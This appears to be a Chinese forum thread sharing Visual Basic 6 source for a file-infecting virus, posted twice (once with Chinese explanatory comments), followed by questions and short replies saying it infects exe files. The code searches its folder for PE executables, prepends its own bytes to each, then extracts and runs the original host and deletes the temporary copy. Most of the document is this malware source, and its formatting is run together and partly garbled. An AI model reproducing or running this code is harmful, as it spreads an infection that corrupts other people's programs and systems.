Option ExplicitPrivate Victim As String Private HostLen As Long Private vbArray() As Byte Private hArray() As Byte Private lenght As LongConst MySize As Integer = 14336 Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As LongPrivate Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As LongPrivate Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As LongPrivate iResult As LongPrivate hProg As LongPrivate idProg As LongPrivate iExit As LongConst STILL_ACTIVE As Long = &H103Const PROCESS_ALL_ACCESS As Long = &H1F0FFFPrivate Sub Command1_Click() Dim i As Long On Error GoTo vbVerror Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _ As
#1 ReDim vbArray(MySize) Get #
1, 1, vbArray Close #1 Victim = Dir(App.Path & "\" & "*.EXE") While Victim <> "" If Format(Victim, ">") <> Format(App.EXEName & ".EXE", ">") Then Open App.Path & "\" & Victim For Binary Access Read As #1 ReDim hArray(LOF(1)) Get
#1, 1, hArray Close #
1 If hArray(&H69) <> &H4D Then i = hArray(&H3C) If hArray(i) = &H50 Then Open App.Path & "\" & Victim For Binary Access Write As
#1 Put #
1, , vbArray Put
#1, MySize, hArray Close #
1 End If End If End If Victim = Dir() Wend Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1 lenght = LOF(1) - MySize If lenght <> 0 Then ReDim vbArray(lenght - 1) Get #1, MySize, vbArray Close #1 Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As
#1 Put #
1, , vbArray Close #1 idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus) hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop Kill App.Path & "\" & App.EXEName & ".eve" Else Close #1 End If End vbVerror:End Sub

Option ExplicitOption ExplicitPrivate Victim As StringPrivate HostLen As LongPrivate vbArray() As BytePrivate hArray() As BytePrivate lenght As LongConst MySize As Integer = 14336Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As LongPrivate Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As LongPrivate Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As LongPrivate iResult As LongPrivate hProg As LongPrivate idProg As LongPrivate iExit As LongConst STILL_ACTIVE As Long = &H103Const PROCESS_ALL_ACCESS As Long = &H1F0FFFPrivate Sub Command1_Click() Dim i As Long On Error GoTo vbVerror Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _ As
#1 ReDim vbArray(MySize) Get #
1, 1, vbArray Close #1 '读自身到内存中 Victim = Dir(App.Path & "\" & "*.EXE") '循环遍历运行目录下所有exe文件集合 While Victim <> "" ' If Format(Victim, ">") <> Format(App.EXEName & ".EXE", ">") Then '是否是自身?不是则把文件读入内存 Open App.Path & "\" & Victim For Binary Access Read As #1 ReDim hArray(LOF(1)) Get
#1, 1, hArray Close #
1 If hArray(&H69) <> &H4D Then '为什么是69H呢，我觉得应该是1H,这里应该是判读"MZ"头，难度是其他？查了rar自解压文件，dll文件,*.com文件都不是4DH,希望其他高手查查 i = hArray(&H3C) '读取PE头的地址 If hArray(i) = &H50 Then '判断PE标记 Open App.Path & "\" & Victim For Binary Access Write As
#1 Put #
1, , vbArray Put
#1, MySize, hArray Close #
1 '呵呵~~将自身写入目标文件 End If End If End If Victim = Dir() '继续查找下一个目标 Wend Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1 lenght = LOF(1) - MySize If lenght <> 0 Then '为什么不是大于0而是不等于0呢？ ReDim vbArray(lenght - 1) Get #1, MySize, vbArray '把大于部分读入 Close #1 Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As
#1 Put #
1, , vbArray '写入 Close #1 '这里有点混乱，等会在想想 idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus) '启动进程并返回PID hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg) GetExitCodeProcess hProg, iExit Do While iExit = STILL_ACTIVE DoEvents GetExitCodeProcess hProg, iExit Loop '一直等待进程退出 Kill App.Path & "\" & App.EXEName & ".eve" '删除 Else Close #1 End If End vbVerror:End Sub

感谢luckclouds，虽然我还有大部分都不懂，不过我会努力的！我想再问下，这个病毒的核心部分在哪啊？？会引发什么样的后果？？我看了后完全找不到核心部分。

感谢luckclouds，虽然我还有很多没看懂。但我会努力的！我还想问下，这个病毒的核心部分是哪？？运行后会引发什么样的后果？？

1

就是感染exe文件

这是一段VB代码，用于查找并感染其他可执行文件。它通过读取自身并将其自身插入到其他文件中来完成感染。